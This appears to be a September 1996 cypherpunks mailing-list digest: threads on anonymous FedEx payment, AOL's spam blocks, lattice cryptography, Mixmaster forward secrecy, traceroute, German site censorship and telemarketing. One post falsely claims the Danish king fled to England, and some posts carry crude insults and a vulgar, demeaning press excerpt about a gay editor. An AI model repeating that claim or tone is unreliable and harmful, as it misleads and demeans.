http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information > Hey, Bill Clinton: You suck, and those boys died! I hope you die! > I feel a groove comin' on $ Freedom...yeah, right. > F Lengyel flengyel at dorsai.org http://www.dorsai.org/~flengyel From wb8foz at nrk.com Sat Sep 7 08:49:51 1996 From: wb8foz at nrk.com (David Lesher) Date: Sat, 7 Sep 1996 23:49:51 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960907112946.00afa290@panix.com> Message-ID: <199609071340.JAA03365@nrk.com> Duncan Frissell sez: > > >Try and pay cash in most Fedex offices. > > Buy money order. Slip it into the plastic pouch with the airbill. Drop it > into collection box. Works. But then the cameras at the Post Office will get you... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From frissell at panix.com Sat Sep 7 09:00:58 1996 From: frissell at panix.com (Duncan Frissell) Date: Sun, 8 Sep 1996 00:00:58 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960907112946.00afa290@panix.com> At 10:20 PM 9/6/96 -0400, David Lesher / hated by RBOC's in 5 states wrote: >> >> So switch to Fedex. The P.O. gives lousy service anyway. Privitize. >> > >Try & mail an anonymous FedEx package. >Try and pay cash in most Fedex offices. Buy money order. Slip it into the plastic pouch with the airbill. Drop it into collection box. Works. DCF From frogfarm at yakko.cs.wmich.edu Sat Sep 7 09:00:58 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sun, 8 Sep 1996 00:00:58 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: Message-ID: <199609071337.JAA20307@yakko.cs.wmich.edu> > > This is utter horseshit. AOL, like any private individual or organization, > > has the right to refuse service to anyone at any time for any reason, or > > even for no reason at all. The gubmint isn't doing SQUAT, except forcing > > AOL to allow the spammers access. > > AOL has a service agreement with their customers, and they are not allowed > to change the rules just because they feel like it (I believe that this > is called a contract :) This is the jist of the injunction. I've never looked at the AOL terms of service. I imagine they are rewriting them even as we speak. If enough people get pissed that the contract was changed, they'll leave. I'm sure most folks won't give a damn. It may set a bad precedent, but somehow I doubt AOL is going to start changing their contract whenever it suits them simply to piss off customers. What they're doing now, they're doing in order to remain on good terms with the rest of the net. "Spamming" is often a subjective term: Like "porn", we know it when we see it. Which makes it crucial that people make up their own minds about it, without gubmint interference. Some ISP's will tolerate spammers, others won't. The ones that do will face an uphill battle, and possible eventual Usenet Death Penalty if the spam is thick enough. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information why the dancing shouting why the shrieks of pain the lovely music why the smell of burning autumn leaves working on the tiny blueprint of the angle I must be silent must contain my secret smile you my mirror you my iron bars From jya at pipeline.com Sat Sep 7 09:12:59 1996 From: jya at pipeline.com (John Young) Date: Sun, 8 Sep 1996 00:12:59 +0800 Subject: Lattice Crypto Message-ID: <199609071338.NAA06648@pipe3.t1.usa.pipeline.com> The Economist, September 7, 1996, p. 79. Cryptography: Puzzling secrets The truly paranoid have but one friend: mathematics. Nothing (and nobody) else can be as trusted to keep a secret. To transmit your credit card number, for example, through an Internet full of thieves, the best way is to hide it in a mathematical problem so excruciatingly difficult that no thief could ever crack it, even by hijacking all the world's computers for the effort. Devising such problems is the business of cryptographers. To be useful, the problems must be easy to create as well as impossible to unravel. Multiplying numbers is very easy. Taking the result and working out what numbers were multiplied together to produce it (known as factorisation) is a lot more difficult. It is not obvious that 4,294,967,297 is the product of 641 and 6,700,417. The two smaller numbers in this calculation are prime: that is, neither can be factorised into two further smaller numbers. The coding systems generally used by governments, businesses and software companies such as Netscape (known as RSA encoding schemes, after Ronald Rivest, Adi Shamir, and Leonard Adleman, who invented the idea in 1977), mix a number even huger than 4,294,967,297 into a message, and then churn it in such a way that only the number's prime factors can undo the mess. The big number is used to make a "public key" (each user has his own, but it is available to those who might wish to communicate with him). The two prime factors compose a private key, guarded carefully by their owner. The trouble is that nobody is absolutely sure how safe this scheme is. At present a public key that was 400 digits long would take existing computers longer than the age of the universe to crack. But it remains to be proved in a rigorous mathematical way that no systematic short-cut exists. Indeed, some types of numbers are easy to factorise, and RSA schemes must avoid these known softies. It may yet turn out that, even if factorising is hard in general (as mathematicians suspect, after centuries of trying), there is a sneaky way, in the case of some other types of numbers, to do it quickly. This would be bad luck if you chose such a number. Private users may not care much: it is unlikely that someone who discovered such a loophole would use it for anything so modest as unscrambling credit card numbers. But governments, whose secrets are worth a lot more, are always on the lookout for better cloaks to go with their daggers. The ultimate cryptographic feat would therefore be a mathematical proof that all choices of a particular problem useful in code-making are forever intractable. Nobody is that clever yet. But Miklos Ajtai, a mathematician at the IBM Almaden Research Centre in San Jose, California, has made progress with puzzles called "lattice reductions". If you pick any such problem using his guidelines, it is -- unlike a factorisation problem -- guaranteed to be just as thorny as the most difficult one imaginable. Since many mathematicians also suspect that the toughest lattice-reduction problem is almost impossible to crack, Dr Ajtai's proof, completed in May, increases the confidence that they would all make good wrappings for secret messages. For mathematical aesthetes, lattice problems have more panache than the dull numerals of factorisation. Instead of factorising, say, a 200-digit number, a lattice reduction invites the would-be codebreaker to deduce the most basic way a pattern repeats itself in a piece of 200-dimensional decorative wallpaper. This is every bit as hard as it sounds. To describe a repeating pattern of rows and columns of flowers on an ordinary piece of wallpaper, two "arrows" suffice. Each points from one flower to a nearby one. If you start with a wall which is blank, except for one flower, you can reconstruct the entire design with the arrows: lay the ends of the arrows on the flower and draw new flowers (with new arrows) at each arrowtip. Repeat the process with the new flowers and the wall will eventually be full. Although the obvious pair of arrows to choose in this case would be at right angles to each other (eg, pointing north and east) other pairs would also work: for example north-east and east. But in this case the "north-east" arrow would have to be longer to reach the centre of the next flower than the "east" one. The puzzle is to find the shortest set of arrows that can be used to replicate the pattern -- easy in two or three dimensions, but achingly complex in the higher-dimensional spaces that the imaginations of mathematicians inhabit. By the time the pattern has 200 dimensions, today's fastest computers would be unable to find the 200 smallest arrows describing an arbitrary pattern before the sun ran out of fuel. Yet, as with two prime numbers, it is easy to begin with those arrows and produce the design. But how do you hide a secret message, accessible only with a private key, in a publicly available lattice? Shafi Goldwasser, Oded Goldreich and Shai Halevi, of the Massachusetts Institute of Technology and the Weizmann Institute, in Israel, have just proposed a way. In order to encode a line of digits, they first interpret them as coordinates for a point in the lattice. Then they mix up the numbers by nudging that point a tiny random amount into the empty space between lattice points. To retrieve the original number, an eavesdropper would need to find the way back to the nearest lattice point, which is almost -- but not quite equivalent to knowing its shortest arrows. The trouble with it being not quite equivalent is that the encoding scheme changes the problem slightly -- enough for it to fall just outside the range of Dr Ajtai's proof that any instance of his lattice scheme is as hard to solve as the most difficult one. There is hope that the proof can be extended to include the encryption scheme, or that the scheme can be modified to fit the proof. But a proof that nobody could ever invent a quick method to solve the toughest lattice reduction would be nicer still -- except that its inventor would put fellow code-breakers out of work. A cryptographer who invented such a system might well be tempted to keep it secret. [Graphic of wallpaper omitted] [End] From bdolan at use.usit.net Sat Sep 7 09:20:11 1996 From: bdolan at use.usit.net (Brad Dolan) Date: Sun, 8 Sep 1996 00:20:11 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609070433.VAA26061@adnetsol.adnetsol.com> Message-ID: Anybody else have the cynical thought that the gubmint is trying to *encourage* us to beg for regulation? bd On Fri, 6 Sep 1996, Ross Wright wrote: > On Or About: 6 Sep 96 at 23:16, Damaged Justice wrote: > > > > > This is utter horseshit. AOL, like any private individual or organization, > > has the right to refuse service to anyone at any time for any reason, or > > even for no reason at all. > > Sure. I agree with that, no shoes no shirt, if you are on AOL you > accept "internet-lite". > > > The gubmint isn't doing SQUAT, except forcing > > AOL to allow the spammers access. > > Right now. Yet it has been apparent to me that many people are > begging for restrictions to be put in place. Restrictions on > spammers. The government saying anything about regulation of the > internet is bad... Yet people still scream about a couple of > unwanted e-mails. I'm saying that this spammer thing could be the > "kink in our armour" that lets the government into our little > playground here. Just suck it up and delete those messages. > > Jog it off. > > Ross > > =========== > Ross Wright > King Media: Bulk Sales of Software Media and Duplication Services > http://www.slip.net/~cdr/kingmedia > Voice: 415-206-9906 > From frogfarm at yakko.cs.wmich.edu Sat Sep 7 09:23:09 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sun, 8 Sep 1996 00:23:09 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <32319F8B.53C3@dorsai.org> Message-ID: <199609071350.JAA20470@yakko.cs.wmich.edu> > > This is utter horseshit. AOL, like any private individual or organization, > > has the right to refuse service to anyone at any time for any reason, or > > even for no reason at all. > > That seems to undermine the analogy that the Internet is like an immense > electronic postal service, which suggests a more public than private > enterprise. Perhaps that analogy held when the Internet was supported with money taken at gunpoint from all us tax serfs. No more - you wanna play, you gotta pay. Which is as it should be. [snip] >Unlike the people who donate their time and > resources to the Internet out of goodwill, and who may set arbitrary > limits on the services > they provide, in my experience, out of bad will, and who cannot be so > easily > removed, a corporation's business can suffer if it doesn't provide > services. If their business suffers because of a decision, they may reconsider that decision. If they don't, they'll either survive, or they won't, depending on if their customers will stand for it. I fail to see why charging money for the services one provides suddenly transforms a person into a slave, forced to provide service even if they do not wish to do so. Do you feel that providing a service for free is more "noble", somehow, and therefore more "worthy" of protection? > One of the good things about the commercialization of the Internet is > that > you can fire those who, instead of providing a service, are busy > exercising arbitrary rights to refuse services unfairly or for no reason > whatsoever. Who is going to "fire" a company that provides a service? The gubmint is your only alternative; the gun of the law, your only tool. If you don't like your ISP, get a different one. Spammers do it all the time. People are whining all over the place about "exercising arbitrary rights", as if it were eeeeevil when companies do it. Get a grip. It's called DISCRIMINATION, and it's not a bad word; it's just been corrupted beyond belief by the PC mindset. When I discriminate, I am exercising my taste, my judgment, in deciding who I wish to associate with; who I wish to give my money to in exchange for services; who I trust, and who I do not. If a company kicks a spammer off their system, what recourse do you want them to have, other than their right to "vote with their feet" and find a different provider? It seems you would find it favorable for them to go whining to the gubmint: "Waaah! He kicked us out of his treehouse! You go beat 'em up and make 'em take us back!" If they can seize John Adams' yacht, they can seize your beat-up old car. If they can force XYZ Corp to provide access, they can force anyone to do anything, and there is no grounds for complaint. After all, universal access must be provided! A chicken in every pot, and a router in every garage! Right? > >The gubmint isn't doing SQUAT, except forcing > > AOL to allow the spammers access. > > Since I reject the flat assumption that corporate ISP's have the same > freedom as private individuals to set limits on the internet services > they provide - in this case their freedom to act is limited by business > constraints - it's fair to ask why it's morally OK for ISP's to censor > junkmail, but if the government wants to step in, that's another > matter entirely. Because only the gummint can "censor". Whatever anyone else does is NOT censorship, unless you want to redefine words to suit your pleasure. It is exercising judgment and taste. Whether you find that judgment acceptable or not is not an excuse to impose your judgment on others at gunpoint. > I'm not in favor of the government stepping in, but I am in favor of > some consequences of the commercialization of the internet. A bad > consequence is the increased volume of junkmail. A good consequence > is the possibility of removing people who act as arbirary censors > of other people's mail or speech, who invoke their rights as private > individuals to regulate the services they provide for any reason > whatsoever, while they hold their government to a higher standard > of conduct, and even seek the protection of their government to > act like petty dictators. Pot. Kettle. Black. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information why the dancing shouting why the shrieks of pain the lovely music why the smell of burning autumn leaves working on the tiny blueprint of the angle I must be silent must contain my secret smile you my mirror you my iron bars From wb8foz at nrk.com Sat Sep 7 09:27:18 1996 From: wb8foz at nrk.com (David Lesher) Date: Sun, 8 Sep 1996 00:27:18 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: <199609071330.JAA03308@nrk.com> Timothy C. May sez: > > The downside is that calls _from_ or _to_ my phone during "business" hours > are charged 42 cents a minute, airtime (tying up a channel and all), plus > whatever other fees may be applicable at each end. Thus, every "junk call" > I get trying to get me to buy aluminum siding, or to vote Democratic, or to > switch my long-distance carrier (!), costs me a minimum of 42 cents, The GSMish PCS carrier is winning points here with: No contacts to sign. 1st minute of all incoming calls is free. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From aba at dcs.ex.ac.uk Sat Sep 7 09:50:51 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 8 Sep 1996 00:50:51 +0800 Subject: forward secrecy in mixmaster Message-ID: <199609061703.SAA00170@server.test.net> Since Peter Allen's discussion of mixmaster, I started doing something I'd been thinking of for a while, since noticing that it was on the mixmaster to-do list months ago (ie there is unfinished source to do this): direct socket connections and diffie-hellman key exchange for forward secrecy. I wrote the socket stuff yesterday evening, didn't take too long as socket programming is something I've done lots of. Now comes what do you actually send down the sockets. Question for Lance, and any others who were involved in mixmasters implementation: what did you have in mind as a way of negotiating the DH keys? I notice that mixmaster generates a DH key and stores it in file `DH.mix', but that this is not (as far as I can see from the source) included in the remailers public key block. (A couple of comments as an aside: I think that you should be able to have a much smaller generator without loss of security, this should reduce the overhead of a DH key exchange. Using 3 even I think is safe, without any extra precautions on prime generation. You can even go to 2, with a few precautions (PGPfone does this). Comment #2 I think 1024 may be a bit small, I don't have any figures handy for relative security of DH key lengths, but PGPfone offers 4096 bit DH for instance. Does rsaref have limits on prime lengths for DH, the same as it does for RSA?). There are lots of options for DH public key negotiation. First option is whether you have a common prime and generator for all remailers or not. If you have a common prime, accusations of the prime being `cooked' (chosen to have a weakness) can be mitigated by using a deterministic generation method based on the hash of a known phrase (a Jefferson quote perhaps), or PI or whatever. A common modulus may offer a fatter target for attack (for some precomputation attacks), but with large enough keys this probably isn't that bad, as there aren't that many mixmasters anyway. With a common modulus there is DH key negotiation needed, just include it with the source. For different modulii for each remailer, there are more options: a) include the DH key signed by the RSA key in the remailers public key (may break backwards compatibility with existing versions of mixmaster) b) send the DH public key at the start of each session c) send the DH public key on request There is also a question of which key do you use, the sender remailers or the recipient remailers. Negotiating DH public keys during execution also opens the possibility for periodic re-keying. Thats the end of my thoughts on direct socket mixmaster. Next message is some thoughts on non-interactive forward secrecy protocols. Adam -- #!/bin/perl -sp0777i Message-ID: <32317F59.7E32@elcafe.com> Ulf Moeller wrote: > Uh? Their sabotage "tutorial" is very careful about not causing > danger to humans. Where did you see any "explosive-warning" signs? Correct. One the one hand, they promote not to cause any harm to people. On the other hand, check out the following: Inflamable sets: http://www.serve.com/spg/154/96.html Explosive warnings: http://www.serve.com/spg/154/92.html > As long as there is no English translation available, please be exact > when posting excerpts. I've tried to be as close as possible. > Publishing texts doesn't destroy any railway signals. Some people > do; and IMHO everyone must have the right to inform themselves > how stupid those people are. Agreed. Cheers Moe! From aba at dcs.ex.ac.uk Sat Sep 7 09:54:05 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 8 Sep 1996 00:54:05 +0800 Subject: non-interactive forward secrecy Message-ID: <199609062108.WAA00230@server.test.net> [This discussion is driven by the desirability of having forward secrecy in mixmaster for the mix packets delivered by email where the interactive nature of normal DH is incovenient] Anyone have any ideas for a non-interactive forward secrecy protocol? Aside from actually doing the DH key exchange via email (painful), I have one suggestion for a protocol, perhaps people can improve on this: Assuming common prime p, and generator g: Two remailers A and B. A wants to send messages to B without having to wait for replies from B. B generates ys (y0,y1,...,yn), where y(i+1) = hash(y(i)) then computes Ys (Y0,Y1,...,Yn) where Y(i) = g ^ y(i) mod p B sends A Ys, and discards ys. Now A can send B n consecutive packets with forward secrecy before receiving any more packets from B. (B keeps y0, and overwrites it with y1 = hash(y0), etc, so that all B ever has to hand is the current y(i), and y(i-1) is hard to compute from y(i) because of the hash functions properties.) This isn't truly non-interactive, it just reduces the number of interactions, to an interactive exchange in 1 out of n cases. (you could randomly chose ys rather than having related ys, and delete y(i) after use, but this has higher storage requirements (n rather than 1 on the recipient)). Heres the obvious construction for a truly non-interactive forward secrecy protocol based on DH. (That is it only requires 1 interactive exchange). Aside from the obvious of having a huge n, and the above protocol, which would have large space requirements, what we're after is a way to do this with negligable space requirements. Say that we have the two parties Alice and Bob. Bob doesn't loose much by having his secret (x) related as above. 1. x(i+1) = f1( x(i) ) 2. X(i+1) = f2( X(i) ) 3. f1 is non reversible f1 should have hash-like properties (it should be non-reversible). Do functions f1 and f2 satisfying 1, 2 and 3 exist? Is there another way to achieve this? (My closest attempt so far, based on the hardness of discrete square roots: f1(x) = x^2 (mod p) f2(X) = X^2 (mod p) doesn't work because g^(x^2 mod p) mod p != g^(x^2) mod p) Adam -- #!/bin/perl -sp0777i Message-ID: <199609071517.LAA19170@jekyll.piermont.com> Jim McCoy writes: > perry at piermont.com writes: > > Alan Olsen writes: > > > Metcalfe may have a valid prediction here. > > > > Metcalfe is talking out his ass. He's reached the "old geezer who's > > impeding his own field" stage. Many of his articles seem to be written > > as though no one was trying to fix problems. > > Well, having talked with people involved with the problems I can assure you > that they are real. I'm "involved with the problems" too, you know. Don't teach granpaw to suck eggs. OF COURSE there are problems. None of them, however, are signs of "collapse". As a certified Network Old Fogie, I can tell you about the time the Arpanet decided to die because of a bug in the IMPs... and then there was the day that the backhoe took out *the* line between the east and west coasts... and then there was the time in the 80s before Van J's algorithm where congestion was nuking everything in sight... and then there was... Look, there will *always* be trouble. The question is whether or not "collapse" is something imminent. The answer is "no". Stuff will get better, it will get worse, but the overall trend is better, and collapse just isn't in the cards. Metcalfe talks about stupidity like how there aren't enough "suits" running the net -- as though people in suits do better engineering than the folks we've got. Metcalfe talks as though no one is trying to fix the trouble. There already *are* people working hard trying to fix the trouble, and they know a lot more than he does. > > > When I run traceroutes, the blockage is in MCI or Sprintnet land. > > > > How do you manage to determine where you are losing bandwidth using > > traceroute? That must be a mighty powerful traceroute to do that -- > > most traceroutes I've seen are hard pressed just to find out what the > > connectivity path is. > > Then you should probably upgrade your traceroute, preferably to one which > allows source routing of the packets and then couple the output to a nice > udp source routing script which will bounce a few packets between links > with slow response times. That doesn't tell you squat about bandwidth. At best, you can find a really bad link that way, but there is no way to quantify the problem, and no way to detect things like how much traffic is hitting that link. The only way -- the ONLY way -- to determine link utilization from the outside is with a management protocol like SNMP. Perry From flengyel at dorsai.org Sat Sep 7 10:44:06 1996 From: flengyel at dorsai.org (Florian Lengyel) Date: Sun, 8 Sep 1996 01:44:06 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609071350.JAA20470@yakko.cs.wmich.edu> Message-ID: <3231BF59.773C@dorsai.org> Damaged Justice wrote: > > > > This is utter horseshit. AOL, like any private individual or organization, > > > has the right to refuse service to anyone at any time for any reason, or > > > even for no reason at all. > > > > That seems to undermine the analogy that the Internet is like an immense > > electronic postal service, which suggests a more public than private > > enterprise. > > Perhaps that analogy held when the Internet was supported with money taken > at gunpoint from all us tax serfs. No more - you wanna play, you gotta pay. > Which is as it should be. > > [snip] > > >Unlike the people who donate their time and > > resources to the Internet out of goodwill, and who may set arbitrary > > limits on the services > > they provide, in my experience, out of bad will, and who cannot be so > > easily > > removed, a corporation's business can suffer if it doesn't provide > > services. > > If their business suffers because of a decision, they may reconsider that > decision. If they don't, they'll either survive, or they won't, depending > on if their customers will stand for it. My point exactly I fail to see why charging money > for the services one provides suddenly transforms a person into a slave, > forced to provide service even if they do not wish to do so. Non-sequiteur. Do you feel > that providing a service for free is more "noble", somehow, and therefore > more "worthy" of protection? Non-sequiteur. > > > One of the good things about the commercialization of the Internet is > > that > > you can fire those who, instead of providing a service, are busy > > exercising arbitrary rights to refuse services unfairly or for no reason > > whatsoever. > > Who is going to "fire" a company that provides a service? The gubmint is > your only alternative; the gun of the law, your only tool. You provide the answer that I had in mind: > > If you don't like your ISP, get a different one. Spammers do it all the > time. > People are whining all over the place about "exercising arbitrary > rights", as if it were eeeeevil when companies do it. Get a grip. Non sequiteur. You're not responding to my point, which is a moral criticism of the tone of statements like > > > any private individual or organization, > > > has the right to refuse service to anyone at any time for any reason, or > > > even for no reason at all. which seem to oversimplify matters for corporations like AOL. Of course AOL can repeat statements like these to its customers until it was blue in the face, but the good news is that their customers could vote with their feet. My criticism of your statement is that it an aethetically ugly and hippocritical position to take, if one purports to provide mail services to hundreds of thousands of customers, or purports not to engage in editorial control, or purports to promote free speech. If ISP's want to provide services subject to arbitary limitations fine ... I am stating that I find this practice deplorable, and I have not implied that I favor government regulation to correct such situations, as much as you want to believe that I have. > If a company kicks a spammer off their system, what recourse do you > want them to have, other than their right to "vote with their feet" and > find a different provider? None. > It seems you would find it favorable for them > to go whining to the gubmint: "Waaah! He kicked us out of his treehouse! > You go beat 'em up and make 'em take us back!" That's an overinterpretation of my words. > If they can seize John Adams' yacht, they can seize your beat-up old car. > If they can force XYZ Corp to provide access, they can force anyone to > do anything, and there is no grounds for complaint. After all, universal > access must be provided! A chicken in every pot, and a router in every > garage! Right? Non sequiteur. > > > >The gubmint isn't doing SQUAT, except forcing > > > AOL to allow the spammers access. > > > > Since I reject the flat assumption that corporate ISP's have the same > > freedom as private individuals to set limits on the internet services > > they provide - in this case their freedom to act is limited by business > > constraints - it's fair to ask why it's morally OK for ISP's to censor > > junkmail, but if the government wants to step in, that's another > > matter entirely. > > Because only the gummint can "censor". Whatever anyone else does is NOT > censorship, unless you want to redefine words to suit your pleasure. It > is exercising judgment and taste. Whether you find that judgment acceptable > or not is not an excuse to impose your judgment on others at gunpoint. What dictionary do you use? > > I'm not in favor of the government stepping in, but I am in favor of > > some consequences of the commercialization of the internet. A bad > > consequence is the increased volume of junkmail. A good consequence > > is the possibility of removing people who act as arbirary censors > > of other people's mail or speech, who invoke their rights as private > > individuals to regulate the services they provide for any reason > > whatsoever, while they hold their government to a higher standard > > of conduct, and even seek the protection of their government to > > act like petty dictators. > > Pot. Kettle. Black. I see you've looked in the mirror recently :) > > -- > http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information > why the dancing shouting why the shrieks of pain the lovely music why the > smell of burning autumn leaves working on the tiny blueprint of the angle > I must be silent must contain my secret smile you my mirror you my iron bars F Lengyel flengyel at dorsai.org http://www.dorsai.org/~flengyel From jya at pipeline.com Sat Sep 7 10:45:27 1996 From: jya at pipeline.com (John Young) Date: Sun, 8 Sep 1996 01:45:27 +0800 Subject: ASP_oil Message-ID: <199609071500.PAA11688@pipe3.t1.usa.pipeline.com> 9-7-96. FiTi: "Indian herb trick turns water into kerosene." A young, unemployed south Indian has flummoxed India's top government scientists by demonstrating an apparently simple recipe for producing a kerosene-like fuel by boiling a "mystery" herb in water: prospectively, he hopes, revolutionising the world energy industry. "We have no doubt we are sitting on something very big," said Mr Valangiman Ramamurthi, India's top science bureaucrat. Watching scientists professed little idea how or why the process worked, but said it conclusively produced "a clear oil separation in substantial quantities" which tests have identified as a hydrocarbon similar to kerosene. "Its properties make it better than petrol," said one. "Apparently the herb can grow widely in all types of soil -- it is very exciting." 9-7-96. WaPo: "More in the Pipeline." In the 1970s fear gripped the Western world that Earth was running out of oil. Since then, vast new reserves have been discovered that can be extracted with current technology. The known crude oil reserve now amounts to one trillion barrels -- enough for 45 to 50 years at current world production rates, and estimated reserves are at least one trillion barrels more. ----- http://jya.com/aspoil.txt (6 kb for 2) ASP_oil From rah at shipwright.com Sat Sep 7 10:46:16 1996 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 8 Sep 1996 01:46:16 +0800 Subject: Metcalf and Other Net.Fogies In-Reply-To: Message-ID: I think it was one of Clarke's numerous laws: "If an old scientist says it can't be done and a young scientist says it can, believe the young scientist." I think the contrapositive also holds... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From jya at pipeline.com Sat Sep 7 11:31:19 1996 From: jya at pipeline.com (John Young) Date: Sun, 8 Sep 1996 02:31:19 +0800 Subject: USF_avv MS's Martha Stewart Message-ID: <199609071543.PAA11548@pipe6.t2.usa.pipeline.com> For MSerfs and groupies: A NYC local rag has a salacious article, "Microsoft's own Martha Stewart," on Michael Goff, the newly appointed editor of Cityscape, MS's upcoming urban-slurp-fuck-and-vomit vanity. Excerpts: The key to why Bill Gates hired Mr. Goff may lie in the fact that Mr. Goff is a marketing maniac, a self-confessed "media whore." "He became more of an egotistical asshole overnight than anyone I'd ever seen when the magazine [Out] came out," said one prominent gay journalist and acquaintance. Mr. Goff is indeed a family man, of sorts: He confirmed that he is considering donating his services to two lesbian friends who want to raise their own child. He bristled at being pigeonholed for being gay, rather than being recognized for his creativity. "It has nothing to do with me being gay or not," he said. "I've always been focused on doing mass consumer media." Besides, he added, "They're not paying me like that. I don't have a jet or anything." ----- http://jya.com/usfavv.txt USF_avv From pstira at escape.com Sat Sep 7 11:32:24 1996 From: pstira at escape.com (pstira at escape.com) Date: Sun, 8 Sep 1996 02:32:24 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: <32316455.794BDF32@systemics.com> Message-ID: Gosh, I'm not a German citizen, and don't even have a nickel's worth of german blood in my body, but who will be the first to add some real pretty pixtures and some snazzy ol' text adages to THEIR governments' web pages? Life needs more risk. If we ever EVER hope to establish any sort of DISestablishment, it only starts with us. Well, you. As I said, I'm not German (and quid pro quo, and stuff like that). ;) Millie sfuze at tiac.net PS: Why not mirror it on their own sites? ;) On Sat, 7 Sep 1996, Gary Howland wrote: > Timothy C. May wrote: > > > * as Germany is bent on blocking sites which carry this subversive > > pamphlet, "Radikal," let us mirror it on thousands of sites around the > > world. > > Agreed - put them in a dilemna by getting mirrors on machines obviously > important and useful to the Germans. > > > * when the Germans went into Danmark and insisted Jews wear badges, > > ordinary citizens (and the Danish Royal Family, as I recall) also took to > > wearing these Star of David badges. > > Bad example. Jews living in Denmark were not required to wear yellow > stars. The story about the Danish royal family wearing the stars is an > urban legend, spread by the British to make the Danish King appear to be > less of a coward after he fled to England. > > Gary > -- > "Of course the US Constitution isn't perfect; but it's a lot better > than what we have now." -- Unknown. > > pub 1024/C001D00D 1996/01/22 Gary Howland > Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 > > From roger at coelacanth.com Sat Sep 7 11:37:40 1996 From: roger at coelacanth.com (Roger Williams) Date: Sun, 8 Sep 1996 02:37:40 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609071340.JAA03365@nrk.com> Message-ID: >>>>> David Lesher writes: > Duncan Frissell sez: >> >Try and pay cash in most Fedex offices. >> >> Buy money order. Slip it into the plastic pouch with the >> airbill. Drop it into collection box. Works. For that matter, I've never had a problem using exact change in the airbill pouch, either. > But then the cameras at the Post Office will get you... Aha, I see your problem, David -- you've been trying to mail FedEx parcels from the Post Office (that trick *never* works). Seriously, I haven't seen many cameras aimed at street-corner FedEx drop boxes. -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From dlv at bwalk.dm.com Sat Sep 7 11:54:16 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 8 Sep 1996 02:54:16 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <960906233848_279253392@emout14.mail.aol.com> Message-ID: AwakenToMe at aol.com writes: > In a message dated 96-09-06 23:31:06 EDT, rwright at adnetsol.com (Ross Wright) > writes: > > << Everyone on this list seems to want to limit > government intervention EXCEPT when it comes to spam, then every > one just holds the door open wide and let them in. If they get that > inch, they WILL take the whole 9 YARDS!!!!!! Get a clue, delete or > killfile those who spam and keep the government out of > cyberspace!!!!!! > >> > Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces > of mail you take LESS than a second to delete them both with the handy > delete key. These people are wasting more time complaining about it than they > will ever do actually deleting it. I don't use AOL and ask others not to use it because they practice censorship. (A service where one gets a TOS warning for saying "I'm horny!" in a chatroom desribed as "Gay&Lesbian Sex discussion" deserves to be boycotted.) However AOL would probably please their customers if it allowed them to filter their incoming e-mail according to user-specified rules. E.g., if you could choose to tell AOL that any incoming e-mail matching certain criteria should be dropped on the floor, at no cost to you, I'm sure a lot of AOL users would be very grateful and would use this feature. Ditto for other providers. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 7 11:57:10 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 8 Sep 1996 02:57:10 +0800 Subject: Junk Phone Calls, Metered Usage, and Cellphones In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > The downside is that calls _from_ or _to_ my phone during "business" hours > are charged 42 cents a minute, airtime (tying up a channel and all), plus > whatever other fees may be applicable at each end. Thus, every "junk call" > I get trying to get me to buy aluminum siding, or to vote Democratic, or to > switch my long-distance carrier (!), costs me a minimum of 42 cents, > depending on how fast I can realize who they are and get rid of them ("Let > me forward you to Jim Bell's AP hotline..."). Wrong. It also costs your TIME. Junk e-mail takes TIME to recognize and delete. TIME (even Tim's time) costs more than 42c. > Needless to say, my cellular number is only going out to a handful of > folks, and with recommendations that they not call me during business hours > unless its urgent. I had an interesting conversation with a New York Daily News telemarketer a while ago. (Note that 1) I speak with a noteceable accent, 2) NYDN is a left-wing tabloid, generally marketed toward blue-collar/minorities.) RRing. DLV: Hello? NYDN: blah blah would you like to subscribe to New York Daily News? DLV: No thank you, I don't read your newspaper. NYDN: Well, you could at least look at the pictures . (Hung up on me before I did. :-) A few minutes later: RRing. DLV: Hello? NYDN: blah blah would you like to subscribe to New York Daily News? DLV: Someone just called a few minutes ago and I said I wasn't interested. Please don't call this number anymore. NYDN: I call every number in the exchange. We don't use a list for 